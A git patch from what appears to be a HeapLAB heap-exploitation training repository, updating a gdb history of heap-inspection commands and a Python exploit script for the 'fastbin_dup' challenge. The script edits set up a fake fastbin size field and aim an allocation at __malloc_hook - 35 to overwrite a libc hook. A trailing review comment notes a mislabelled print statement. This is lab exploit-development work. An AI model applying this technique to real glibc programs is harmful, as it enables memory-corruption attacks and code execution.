From 4c06c05f4eaf614ff0dfd4fe0fa62557331d7fb7 Mon Sep 17 00:00:00 2001
From: Brett Weiland
Date: Mon, 4 Jan 2021 18:48:38 -0600
Subject: modified: HeapLAB/challenge-fastbin_dup/.gdb_history modified: HeapLAB/challenge-fastbin_dup/bruh.py
---
 HeapLAB/challenge-fastbin_dup/.gdb_history | 426 ++++++++++++++---------------
 HeapLAB/challenge-fastbin_dup/bruh.py | 7 +-
 2 files changed, 217 insertions(+), 216 deletions(-)
(limited to 'HeapLAB')
diff --git a/HeapLAB/challenge-fastbin_dup/.gdb_history b/HeapLAB/challenge-fastbin_dup/.gdb_history
index b2cbfcb..4933f78 100644
--- a/HeapLAB/challenge-fastbin_dup/.gdb_history
+++ b/HeapLAB/challenge-fastbin_dup/.gdb_history
@@ -1,256 +1,256 @@ +c +x 0x7f4854db6b40 +c +x 0x7f4854db6b40 +x main_arena x &main_arena -x/100x &main_arena -print main_arena -fastbins +x &__malloc_hook +x main_arena.top +db main_arena.top +c +c +c q -fastbins +print __malloc_hook +print __malloc_hook fastbins c -exit -quit -quit fastbins -print main_arena -q -print main_arena -q +c vis_heap_chunks -print main_arena -db main_arena -db &main_arena -db &main_arena/100 -db &main_arena 100 -db &main_arena 1000 -x main_arena.top -x &main_arena.top -db &main_arena 100 c fastbins -print main_arena -x main_arena.fasbinsY -x &main_arena.fastbinsY -quit -fastbins -x 0x7f0946700b70 -db 0x7f0946700b70 100 -q -fastbins -q +r +c fastbins -q -fastbinsx -db &main_arena 100 -q -db 0x7f2e5c845b60 -0x7f2e5c845b70 + 16 -x 0x7f2e5c845b70 + 16 -x 0x7f2e5c845b70 -x 0x7f2e5c845b70 -x 0x7f2e5c845b60 -vis_heap_chunks -db 0x7f0ba6e3db70 -db 0x555bdeaca000 100 -db 0x7f0ba6e3db70 -db 0x7f0ba6e3db70 - 8 -db 0x7f0ba6e3db70-8 -db 0x7f0ba6e3db70-7 -q -x 0x7fcf882cbb69 -db 0x7fcf882cbb69 -q -vis_heap_chunks -print main_arena -q print main_arena -vis_heap_chunks -q -print main_arena -q -print main_arena -fastbins -r -q -r +vis_heap c -fastbisn -vis_heap_chunks fastbins -quit fastbins -print main_arena c -print main_arena -q -print main_arena -print main_arena -x malloc_free_hook -x __free_hook -x &__free_hook -x &__free_hook 100 -db &__free_hook 100 -q -q -q -q -print main_arena -db 0x7f4858584e10 -c -print victim -q fastbins +r c -x idx -x chunksize(p) -x chunksize -x p -fastbins + quit +db main_arena +db &main_arena.fastbinsY q -x __free_hook -x &__free_hook 100 -db &__free_hook 100 -db &__free_hook - 100 -db &__free_hook-100 -db &__free_hook-100 100 -print main_arena -x 0x7fca0f75fe10 -x/100 0x7fca0f75fe10 -x/100 0x7fca0f75fe10-100 +r c -q -break malloc c fastbins -x __free_hook -fastins -fastbins -print main_arena -x 0x7f072b59ee10 -break malloc -break free -continue -c -c +print &main_arena +print main_arena c print main_arena 
-vis_heap_chunks -vis_heap_chunks +db main_arena +db &main_arena +db &main_arena/100 +db &main_arena 100 +db &main_arena 1000 +q +db main_arena.bins +db &main_arena.fastbinsY +run c -vis_heap_chunks -break free -break malloc c -print main_arena -x &__free_hook - 16 q -print main_arena -vis_heap_chunks +r c +fastbins c +fastbins c -q -db __malloc_hook -db &__malloc_hook -x __malloc_hook -x &__malloc_hook +fastbins +r c -break sysmalloc c -frame 2 -context +r +1 c -break main c -q -x &__malloc_hook -print __malloc_hook -print &__malloc_hook -print __main_arena print main_arena -print main_arena x __malloc_hook x &__malloc_hook -db &__malloc_hook -db &__malloc_hook-100 100 -db &__malloc_hook-100 100*8 -db &__malloc_hook-100 (100*8)+1 -fastbins -c +x 0x7ffff7dd0bc0 +x &main_arena +q +print &main_arena +print main_arena +db main_arena +db &main_arena 100 print main_arena -x __malloc_hook -x &__malloc_hook -db &__malloc_hook-100 (100*8)+1 -c -db &__malloc_hook-100 (100*8)+1 +print &main_arena +db &main_arena +db &main_arena + 1 +db &main_arena+1 +find_fake_fast main_arena.fastbinsY +find_fake_fast &main_arena.fastbinsY +x &main_arena.fastbinsY +db main_arena +db &main_arena +db &main_arena+1 +db &main_arena+0 +dq &main_arena+0 +dq &main_arena+1 +x/x 00007fc130a1cb60 +x/x 0x00007fc130a1cb60 +x/x 0x7fc130a1cb69 +x main_arena +x &main_arena +x 0x0x7fc130a1cb68 +x 0x7fc130a1cb68 +x 0x7fc130a1cb68+1 +x/10x 0x7fc130a1cb68+1 +x/10x 0x7fc130a1cb68+0 +x/10x 0x7fc130a1cb68+1 +x/10x 0x7fc130a1cb69 +db 0x7fc130a1cb69 +db 0x7fc130a1cb71 +db 0x7fc130a1cb70 +x main_arena +print &main_arena +db &main_arena+1 +dq &main_arena+1 +q +x 0x7f7151e3cb70 +db 0x7f7151e3cb70 +db main_arena +db &main_arena print main_arena -x 0x7f5b07a18b40 -break malloc -c -c -c +x main_arena +print &main_arena +db 0x7f7151e3cb69 +db 0x7f7151e3cb68 +db 0x7f7151e3cb67 +db 0x7f7151e3cb68 +db 0x7f7151e3cb69 +dq 0x7f7151e3cb69 +db 0x7f7151e3cb69 +db 0x7f7151e3cb67 +db 0x7f7151e3cb69 +db 0x7f7151e3cb68 +find_fake_fast 
main_arena +find_fake_fast &main_arena +db 0x7f7151e3cb68 +db 0x7f7151e3cb69 +db 0x7f7151e3cb67 +db 0x7f7151e3cb68 +db 0x7f7151e3cb70 +db 0x7fc130a1cb69 +db 0x7f7151e3cb70 +db 0x7f7151e3cb69 +find_fake_fast &__free_hook +find_fake_fast &__realloc_hook +find_fake_fast &__memalign_hook +find_fake_fast &__malloc_initialize_hook +find_fake_fast &__after_morecore_hook +find_fake_fast q q -break __libc_malloc -break malloc -break __malloc_hook -b __malloc_hook -b &__malloc_hook -b *__malloc_hook -b *&__malloc_hook -c -delete 3 -c -pwndbg heap -vis_heap_chunks -print __mallinfo -x __mallinfo -print &__mallinfo -print *__mallinfo -print __mallinfo -print &__mallinfo +quit +q +fastbins +c +frame 4 +context code +x 0x7fd533e9cb68 +db 0x7fd533e9cb68 +x fastbins +print main_heap +print &main_heap +print &main_arena print main_arena -c -break malloc -c -x main_arena.top_check -x main_arena.top_chunk +db 0x7fee89f0ee10 +db 0x7fee89f0ee10 10 +db 0x7fee89f0ee10 48 +db 0x7fee89f0ee10-3 48 +db 0x7fee89f0ee10-3 (16*4) +db 0x7fee89f0ee10 +db 0x7fee89f0ee10 - 1 +db 0x7fee89f0ee10-1 +db 0x7fee89f0ee10-1 1 +db 0x7fee89f0ee10-1 32 +db 0x7fee89f0ee10-1 (48) +db 0x7fee89f0ee10-1 (48 * 3) +db 0x7fee89f0ee10-1 (48*3) +db 0x7fee89f0ee10-1 +db 0x7fee89f0ee10 +q print main_arena -x 0x7f4854db6b40 -x 0x7f4854db6b40 -x 0x7f4854db6b40 +x 0x7fdb92f8ee10 c -x 0x7f4854db6b40 -fastbins -c -x 0x7f4854db6b40 -c -x 0x7f4854db6b40 -x main_arena -x &main_arena +find_fake_fast &malloc_hook +find_fake_fast &__malloc_hook +x __malloc_hook x &__malloc_hook -x main_arena.top -db main_arena.top -c -c -c -q -print __malloc_hook -print __malloc_hook -fastbins -c -fastbins -c -vis_heap_chunks -c -fastbins -r -c -fastbins +x &__malloc_hook +x &__malloc_hook - 16 +x &__malloc_hook +db &__malloc_hook-100 +db &__malloc_hook-100 100 +db &__malloc_hook-1 +db &__malloc_hook +db &__malloc_hook-48 48 +db &__malloc_hook-48 48 * 8 +db &__malloc_hook-48 48*8 +db &__malloc_hook-48*8 48 +db &__malloc_hook-80*8 80 +db 
&__malloc_hook-160*8 80 +db &__malloc_hook-160 80 +db -h +db &__malloc_hook +x __malloc_hook +x &__malloc_hook +x __malloc_hook-100 +x &__malloc_hook-100 +x &__malloc_hook-100 100 +x &__malloc_hook-100 100 +db &__malloc_hook-100 100 +db &__malloc_hook-100 100*8 +print (void*)&malloc_hook +print (void*)&__malloc_hook +db &__malloc_hook-100 101*8 +db &__malloc_hook-100 101*8 +db &__malloc_hook-100 100*8 +db &__malloc_hook-100 +db &__malloc_hook-(16*9) +db &__malloc_hook-(16*9) 16*9 +db &__malloc_hook-(10) (10*16) +db &__malloc_hook-(10) (10*8) +db &__malloc_hook-(1) (10*8) +db &__malloc_hook-(11 +db &__malloc_hook +db &__malloc_hook-1 +db &__malloc_hook-8 +db &__malloc_hook +db &__malloc_hook-32 +db &__malloc_hook-(32/8) +db &__malloc_hook-(32/8) 1 +db &__malloc_hook-(32/8) 10 +db 0x7f5575614b2a 1 +db 0x7f5575614b2a +db 0x7f5575614b20 +db &__malloc_loc +db &__malloc_hook-(16) (16*8) +print (void*)__malloc_hook +print (void*)&__malloc_hook +db 0x7f5575614b36 +0x7f5575614b2a +find_fake_fast +find_fake_fast &__malloc_hook +print (void*)&__malloc_hook +exit +quit print main_arena -vis_heap -c -fastbins -fastbins -c -fastbins -r -c - quit +x 0x7f265fd4cb2d +x 0x7f265fd4cb2d +db 0x7f265fd4cb2d +print (void*)&__malloc_hook +find_fake_fast &__malloc_hook +db 0x7f265fd4cb2d +db 0x7f265fd4cb2d - 1 +db 0x7f265fd4cb2d-1 +db +c +db &__malloc_hook-(16) (16*8) diff --git a/HeapLAB/challenge-fastbin_dup/bruh.py b/HeapLAB/challenge-fastbin_dup/bruh.py index 191cbea..56b0c71 100755 --- a/HeapLAB/challenge-fastbin_dup/bruh.py +++ b/HeapLAB/challenge-fastbin_dup/bruh.py @@ -55,7 +55,7 @@ free(chunk1) #malloc(24, p64(libc.sym.main_arena + 96)) #this sets up a fake size field in the fastbins -malloc(24, p64(0x81)) +malloc(24, p64(0x80)) malloc(24, 'asdf') malloc(24, 'asdf') 
@@ -74,9 +74,10 @@ malloc(119, 'sdfg') #8 * 9 -malloc(119, p64(0)*9 + p64(libc.sym.__free_hook - 16)) +payload_loc = libc.sym.__malloc_hook - 35 +malloc(119, p64(0)*9 + p64(payload_loc)) -print(hex(fake_chunk_loc)) +print("top chunk addr: {}".format(hex(payload_loc))) # ============================================================================= -- cgit v1.2.3
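Review bot: The label in the new `print("top chunk addr: {}".format(hex(payload_loc)))` does not match the value it prints: `payload_loc` is assigned from `libc.sym.__malloc_hook - 35` two lines above, not from the top chunk, so the log line will mislead anyone reading it later. `print("payload_loc: {}".format(hex(payload_loc)))` keeps the label and the value in agreement. The `35` on the `payload_loc =` line is an unexplained literal; a named constant or a short comment giving its derivation would make that line reviewable without re-deriving it. These are top-level statements of a flat script, so there is no enclosing function to note.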